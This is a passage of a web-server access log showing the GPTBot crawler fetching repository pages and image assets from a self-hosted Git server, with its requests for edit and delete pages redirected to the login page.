(KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresWatchdog/main.cpp" -[17/Feb/2026:17:07:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 4095] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/watchdog.py" -[17/Feb/2026:17:07:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final.spec" [Client 74.7.227.38] [Length 12560] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol" -[17/Feb/2026:17:07:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/images" [Client 74.7.227.38] [Length 11413] [Gzip 3.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets" -[17/Feb/2026:17:07:19 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" -[17/Feb/2026:17:07:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" -[17/Feb/2026:17:07:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14567] [Gzip 7.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Footer.tsx" -[17/Feb/2026:17:07:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 15294] [Gzip 7.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Header.tsx" -[17/Feb/2026:17:07:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/Makefile2?display=source" [Client 74.7.227.38] [Length 14742] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:17:07:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/Makefile2?display=source" [Client 74.7.227.38] [Length 14742] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:17:07:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/Makefile2?display=source" [Client 74.7.227.38] [Length 14744] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:17:07:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/TestApp?display=rendered" [Client 74.7.227.38] [Length 10944] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/TestApp" -[17/Feb/2026:17:07:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/Makefile?display=source" [Client 74.7.227.38] [Length 16203] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/Makefile" -[17/Feb/2026:17:07:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/Makefile?display=source" [Client 74.7.227.38] [Length 16205] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/Makefile" -[17/Feb/2026:17:07:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/watchdog_final.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final.spec" -[17/Feb/2026:17:07:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/watchdog_final.spec" -[17/Feb/2026:17:07:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 11104] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images" -[17/Feb/2026:17:07:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup/html/assets/images" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images" -[17/Feb/2026:17:07:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup/html/assets/images" -[17/Feb/2026:17:07:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_upload/main/.Backup/html/assets/images" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images" -[17/Feb/2026:17:07:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_upload/main/.Backup/html/assets/images" -[17/Feb/2026:17:07:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/components/Header.tsx" -[17/Feb/2026:17:07:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup/html/components/Header.tsx" -[17/Feb/2026:17:07:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/components/Footer.tsx" -[17/Feb/2026:17:07:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup/html/components/Footer.tsx" -[17/Feb/2026:17:07:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/components/Header.tsx" -[17/Feb/2026:17:07:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup/html/components/Header.tsx" -[17/Feb/2026:17:07:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/components/Footer.tsx" -[17/Feb/2026:17:07:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup/html/components/Footer.tsx" -[17/Feb/2026:17:07:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup/html/assets/images" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images" -[17/Feb/2026:17:07:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup/html/assets/images" -[17/Feb/2026:17:07:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/watchdog_final.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final.spec" -[17/Feb/2026:17:07:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/watchdog_final.spec" -[17/Feb/2026:17:07:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/watchdog_final.spec" [Client 74.7.227.38] [Length 9856] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final.spec" -[17/Feb/2026:17:07:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresPatrol/watchdog_final.spec" [Client 74.7.227.38] [Length 11875] [Gzip 5.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final.spec" -[17/Feb/2026:17:07:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/images/dcsintegration.png" [Client 74.7.227.38] [Length 11118] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images" -[17/Feb/2026:17:07:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/images/reactor.png" [Client 74.7.227.38] [Length 11119] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images" -[17/Feb/2026:17:07:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/images/bearing.png" [Client 74.7.227.38] [Length 11110] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images" -[17/Feb/2026:17:07:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/images/favicon.ico" [Client 74.7.227.38] [Length 11096] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images" -[17/Feb/2026:17:07:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/images/honeywell-logo.svg" [Client 74.7.227.38] [Length 11184] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images" -[17/Feb/2026:17:07:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/watchdog_final.spec" [Client 74.7.227.38] [Length 1001] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final.spec" -[17/Feb/2026:17:07:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/watchdog_final.spec" [Client 74.7.227.38] [Length 764] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final.spec" -[17/Feb/2026:17:07:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/Makefile?display=source" [Client 74.7.227.38] [Length 16202] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/Makefile" -[17/Feb/2026:17:07:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/TestApp?display=rendered" [Client 74.7.227.38] [Length 10945] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/TestApp" -[17/Feb/2026:17:07:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/TestApp?display=rendered" [Client 74.7.227.38] [Length 10943] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/TestApp" -[17/Feb/2026:17:07:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresPatrol/watchdog_final.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/watchdog_final.spec" -[17/Feb/2026:17:07:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresPatrol/watchdog_final.spec" -[17/Feb/2026:17:07:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresPatrol/watchdog_final.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/watchdog_final.spec" -[17/Feb/2026:17:07:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresPatrol/watchdog_final.spec" -[17/Feb/2026:17:07:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/assets/images/dcsintegration.png" [Client 74.7.227.38] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/dcsintegration.png" -[17/Feb/2026:17:07:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/assets/images/dcsintegration.png" [Client 74.7.227.38] [Length 968] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/dcsintegration.png" -[17/Feb/2026:17:07:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/assets/images/bearing.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/bearing.png" -[17/Feb/2026:17:07:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/assets/images/bearing.png" -[17/Feb/2026:17:07:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/assets/images/honeywell-logo.svg" [Client 74.7.227.38] [Length 9860] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/honeywell-logo.svg" -[17/Feb/2026:17:07:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/assets/images/honeywell-logo.svg" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/honeywell-logo.svg" -[17/Feb/2026:17:07:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/assets/images/honeywell-logo.svg" -[17/Feb/2026:17:07:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/assets/images/honeywell-logo.svg" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/honeywell-logo.svg" -[17/Feb/2026:17:07:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/assets/images/honeywell-logo.svg" -[17/Feb/2026:17:07:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/assets/images/reactor.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/reactor.png" -[17/Feb/2026:17:07:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/assets/images/reactor.png" -[17/Feb/2026:17:07:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/assets/images/favicon.ico" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/favicon.ico" -[17/Feb/2026:17:07:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/assets/images/favicon.ico" -[17/Feb/2026:17:07:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/assets/images/bearing.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/bearing.png" -[17/Feb/2026:17:07:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 